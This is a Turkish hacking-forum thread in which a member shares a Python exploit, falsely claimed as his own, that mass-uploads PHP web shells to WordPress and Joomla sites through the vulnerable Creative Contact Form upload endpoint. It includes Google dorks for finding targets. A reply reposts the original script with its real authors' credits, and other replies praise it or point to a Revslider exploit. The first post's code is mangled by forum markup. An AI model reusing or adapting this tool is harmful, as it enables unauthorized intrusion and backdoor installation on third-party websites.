Welcome to Spyhackerz family! Log in or Sign up to join us

WordPress, Joomla / Mass Shell Upload

Discussion in 'Exploitler' started by Dj_Taleh, Aralık 27, 2016.

  1. Dj_Taleh

    Dj_Taleh Elit üye

    Katılım:Oct 10, 2016
    Mesajlar:
    345
    Özel Mesaj Yolla
    Gecenlerde Kendi Yazdığım Exploittir
    Ne İşe Yarar?
    WordPress Ve Joomla Sitelere Otomatik Shell Atar
    Yazilim PYHTON Dilinde.
    Bunun İçin Pyhton Yüklü Olmalı
    Daha Sonra Bilgisayardan CMD -ye Baglanıp
    Calıştıtırsınız...
    Siteleri List Şeklinde Masa Üstune Atarsaniz

    PHP:
    #!/usr/bin/python[/B][/CENTER]
    [B]
    [
    CENTER]#
    # Exploit Name: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability
    #               Wordpress plugin version: <= 0.9.7
    #               Joomla extension version: <= 2.0.0
    #
    # Vulnerability discovered by Dj_Taleh
    #
    # Exploit written by Dj_Taleh
    #
    # Dork google wordpress:  inurl:inurl:sexy-contact-form
    # Dork google joomla   :  inurl:com_creativecontactform
    #
    # Tested on BackBox 3.x
    #
    # http connection
    import urlliburllib2sysmimetypes
    # Args management
    import optparse
    # file management
    import osos.path

    # Check url
    def checkurl(url):
        if 
    url[:8] != "https://" and url[:7] != "http://":
            print(
    '[X] You must insert http:// or https:// procotol')
            
    sys.exit(1)
        else:
            return 
    url

    # Check if file exists and has readable
    def checkfile(file):
        if 
    not os.path.isfile(file) and not os.access(fileos.R_OK):
            print 
    '[X] '+file+' file is missing or not readable'
            
    sys.exit(1)
        else:
            return 
    file
    # Get file's mimetype
    def get_content_type(filename):
        return 
    mimetypes.guess_type(filename)[0] or 'application/octet-stream'

    # Create multipart header
    def create_body_sh3ll_upl04d(payloadname):

       
    getfields dict()

       
    payloadcontent open(payloadname).read()

       
    LIMIT '----------lImIt_of_THE_fIle_eW_$'
       
    CRLF '\r\n'

       
    = []
       for (
    keyvaluein getfields.items():
          
    L.append('--' LIMIT)
          
    L.append('Content-Disposition: form-data; name="%s"' key)
          
    L.append('')
          
    L.append(value)

       
    L.append('--' LIMIT)
       
    L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]'payloadname))
       
    L.append('Content-Type: %s' get_content_type(payloadname))
       
    L.append('')
       
    L.append(payloadcontent)
       
    L.append('--' LIMIT '--')
       
    L.append('')
       
    body CRLF.join(L)
       return 
    body

    banner 
    """


                                                                            
                    `---'                                                                         
                                                                                                  

                                                         Cr3ative C0nt4ct Form Sh3ll Upl04d

                                         Discovered by:
                                        
                                           Dj_Taleh

                                          Written by:

                                           Dj_Taleh

                                     http://www.SpyHackerz.Com

                                        [email protected]
                                    [email protected]

                                
                                        https://SpyHackerz.Com/
                       https://www.youtube.com/channel/UC-3ND6JYf3j1fe8rw2CyMog/videos
    """

    commandList optparse.OptionParser('usage: %prog -t URL -c CMS-f FILENAME.PHP [--timeout sec]')
    commandList.add_option('-t''--target'action="store",
                      
    help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                      )
    commandList.add_option('-c''--cms'action="store",
                      
    help="Insert CMS Type: wordpress|joomla",
                      )
    commandList.add_option('-f''--file'action="store",
                      
    help="Insert file name, ex: shell.php",
                      )
    commandList.add_option('--timeout'action="store", default=10type="int",
                      
    help="[Timeout Value] - Default 10",
                      )

    optionsremainder commandList.parse_args()

    # Check args
    if not options.target or not options.file or not options.cms:
        print(
    banner)
        
    commandList.print_help()
        
    sys.exit(1)

    payloadname checkfile(options.file)
    host checkurl(options.target)
    timeout options.timeout
    cmstype 
    options.cms

    print(banner)

    if 
    options.cms == "wordpress":
       
    url_sexy_upload host+'/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php'
       
    backdoor_location host+'/wp-content/plugins/sexy-contact-form/includes/fileupload/files/'

    elif options.cms == "joomla":
       
    url_sexy_upload host+'/components/com_creativecontactform/fileupload/index.php'
       
    backdoor_location host+'/components/com_creativecontactform/fileupload/files/'

    else:
       print(
    "[X] -c options require: 'wordpress' or 'joomla'")
       
    sys.exit(1)

    content_type 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'

    bodyupload create_body_sh3ll_upl04d(payloadname)

    headers = {'User-Agent''Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
               
    'content-type'content_type,
               
    'content-length'str(len(bodyupload)) }

    try:
       
    req urllib2.Request(url_sexy_uploadbodyuploadheaders)
       
    response urllib2.urlopen(req)

       if 
    "error" in response.read():
          print(
    "[X] Upload Failed :(")
       else:
          print(
    "[!] Shell Uploaded")
          print(
    "[!] "+backdoor_location+options.file)
    except urllib2.HTTPError as e:
       print(
    "[X] Http Error: "+str(e.code))
    except urllib2.URLError as e:
       print(
    "[X] Connection Error: "+str(e.code))
     
    Hector, Dragon Caliph and KuRaLsZ like this.
  2. Hacker047

    Hacker047 Onursal üye

    Katılım:Jun 2, 2016
    Mesajlar:
    393
    Özel Mesaj Yolla
    Emeğine sağlık denemek lazim
     
    Hector and Dj_Taleh like this.
  3. Dj_Taleh

    Dj_Taleh Elit üye

    Katılım:Oct 10, 2016
    Mesajlar:
    345
    Özel Mesaj Yolla
    evet dene bro :)
     
    Hector likes this.
  4. Adbes

    Adbes Onursal üye

    Katılım:Ocak 20, 2016
    Mesajlar:
    479
    Özel Mesaj Yolla
    taleh senin exploiti çalmışlar :D
    Code:
    #!/usr/bin/python
    #
    # Exploit Name: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability
    #               Wordpress plugin version: <= 0.9.7
    #               Joomla extension version: <= 2.0.0
    #
    # Vulnerability discovered by Gianni Angelozzi
    #
    # Exploit written by Claudio Viviani
    #
    # Dork google wordpress:  inurl:inurl:sexy-contact-form
    # Dork google joomla   :  inurl:com_creativecontactform
    #
    # Tested on BackBox 3.x
    #
    # http connection
    import urllib, urllib2, sys, mimetypes
    # Args management
    import optparse
    # file management
    import os, os.path
     
    # Check url
    def checkurl(url):
        if url[:8] != "https://" and url[:7] != "http://":
            print('[X] You must insert http:// or https:// procotol')
            sys.exit(1)
        else:
            return url
     
    # Check if file exists and has readable
    def checkfile(file):
        if not os.path.isfile(file) and not os.access(file, os.R_OK):
            print '[X] '+file+' file is missing or not readable'
            sys.exit(1)
        else:
            return file
    # Get file's mimetype
    def get_content_type(filename):
        return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
     
    # Create multipart header
    def create_body_sh3ll_upl04d(payloadname):
     
       getfields = dict()
     
       payloadcontent = open(payloadname).read()
     
       LIMIT = '----------lImIt_of_THE_fIle_eW_$'
       CRLF = '\r\n'
     
       L = []
       for (key, value) in getfields.items():
          L.append('--' + LIMIT)
          L.append('Content-Disposition: form-data; name="%s"' % key)
          L.append('')
          L.append(value)
     
       L.append('--' + LIMIT)
       L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', payloadname))
       L.append('Content-Type: %s' % get_content_type(payloadname))
       L.append('')
       L.append(payloadcontent)
       L.append('--' + LIMIT + '--')
       L.append('')
       body = CRLF.join(L)
       return body
     
    banner = """
     
     
      ___ ___               __                            __,-,__                                
     |   Y   .-----.----.--|  .-----.----.-----.-----.   |  ' '__|                               
     |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|   |     __|                               
     |. / \  |_____|__| |_____|   __|__| |_____|_____|   |_______|                               
     |:      |    _______     |__|             __           |_|                                  
     |::.|:. |   |   _   .-----.-----.--------|  .---.-.                                         
     `--- ---'   |___|   |  _  |  _  |        |  |  _  |                                         
                 |.  |   |_____|_____|__|__|__|__|___._|                                         
                 |:  1   |                                                                       
                 |::.. . |                                                                       
                 `-------'    
      _______                  __   __                 _______             __              __
     |   _   .----.-----.---.-|  |_|__.--.--.-----.   |   _   .-----.-----|  |_.---.-.----|  |_  
     |.  1___|   _|  -__|  _  |   _|  |  |  |  -__|   |.  1___|  _  |     |   _|  _  |  __|   _| 
     |.  |___|__| |_____|___._|____|__|\___/|_____|   |.  |___|_____|__|__|____|___._|____|____| 
     |:  1   |       _______                          |:  1   |                                  
     |::.. . |      |   _   .-----.----.--------.     |::.. . |                                  
     `-------'      |.  1___|  _  |   _|        |     `-------'                                  
                    |.  __) |_____|__| |__|__|__|                                                
                    |:  |                                                                        
                    |::.|                                                                        
                    `---'                                                                        
                                                                                                   
     
                                                         Cr3ative C0nt4ct Form Sh3ll Upl04d
     
                                         Discovered by:
                                         
                                        Gianni Angelozzi
     
                                          Written by:
     
                                        Claudio Viviani
     
                                     http://www.homelab.it
     
                                        [email protected]
                                    [email protected]
     
                                https://www.facebook.com/homelabit
                                  https://twitter.com/homelabit
                                https://plus.google.com/+HomelabIt1/
                       https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
    """
     
    commandList = optparse.OptionParser('usage: %prog -t URL -c CMS-f FILENAME.PHP [--timeout sec]')
    commandList.add_option('-t', '--target', action="store",
                      help="Insert TARGET URL: http://www.victim.com[:PORT]",
                      )
    commandList.add_option('-c', '--cms', action="store",
                      help="Insert CMS Type: wordpress|joomla",
                      )
    commandList.add_option('-f', '--file', action="store",
                      help="Insert file name, ex: shell.php",
                      )
    commandList.add_option('--timeout', action="store", default=10, type="int",
                      help="[Timeout Value] - Default 10",
                      )
     
    options, remainder = commandList.parse_args()
     
    # Check args
    if not options.target or not options.file or not options.cms:
        print(banner)
        commandList.print_help()
        sys.exit(1)
     
    payloadname = checkfile(options.file)
    host = checkurl(options.target)
    timeout = options.timeout
    cmstype = options.cms
     
    print(banner)
     
    if options.cms == "wordpress":
       url_sexy_upload = host+'/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php'
       backdoor_location = host+'/wp-content/plugins/sexy-contact-form/includes/fileupload/files/'
     
    elif options.cms == "joomla":
       url_sexy_upload = host+'/components/com_creativecontactform/fileupload/index.php'
       backdoor_location = host+'/components/com_creativecontactform/fileupload/files/'
     
    else:
       print("[X] -c options require: 'wordpress' or 'joomla'")
       sys.exit(1)
     
    content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
     
    bodyupload = create_body_sh3ll_upl04d(payloadname)
     
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
               'content-type': content_type,
               'content-length': str(len(bodyupload)) }
     
    try:
       req = urllib2.Request(url_sexy_upload, bodyupload, headers)
       response = urllib2.urlopen(req)
     
       if "error" in response.read():
          print("[X] Upload Failed :(")
       else:
          print("[!] Shell Uploaded")
          print("[!] "+backdoor_location+options.file)
    except urllib2.HTTPError as e:
       print("[X] Http Error: "+str(e.code))
    except urllib2.URLError as e:
       print("[X] Connection Error: "+str(e.code))
    
    
     
    Hector, KuRaLsZ and Dj_Taleh like this.
  5. Dj_Taleh

    Dj_Taleh Elit üye

    Katılım:Oct 10, 2016
    Mesajlar:
    345
    Özel Mesaj Yolla


    Evet Cok Shey Calmislar :D
     
    Hector likes this.
  6. BaByiN

    BaByiN Üye

    Katılım:Aralık 19, 2016
    Mesajlar:
    26
    Özel Mesaj Yolla
    из старых эксплоитов Revslider дает лучший результат
    from old Revslider exploit gives the best result
    Register or to view Spoiler content!
     
    Hector and Dj_Taleh like this.
  7. justwatch

    justwatch Üye

    Katılım:Aralık 26, 2016
    Mesajlar:
    8
    Özel Mesaj Yolla
    video halinde olsaydı daha ii olurdu elerine sağlik
     
    Hector likes this.
  8. hacker-top

    hacker-top Üye

    Katılım:Ocak 13, 2017
    Mesajlar:
    5
    Özel Mesaj Yolla
    nice <new member
     
    Hector likes this.
  9. Dragon Caliph

    Dragon Caliph Üye

    Katılım:Oct 9, 2016
    Mesajlar:
    187
    Özel Mesaj Yolla
    Güzel paylaşım tam benlik. :) Bu her türlü(yazma izni olmasada) shell atıyor mu?
     
    Hector likes this.
  10. Hector

    Hector Üye

    Katılım:Ocak 15, 2017
    Mesajlar:
    90
    Özel Mesaj Yolla
    Eline koluna sağlık güzel exp
     
  11. RichmanTR

    RichmanTR Üye

    Katılım:Ocak 16, 2017
    Mesajlar:
    20
    Özel Mesaj Yolla
    Teşekkürler Taleh
     
Loading...

Bu sayfayı Paylaş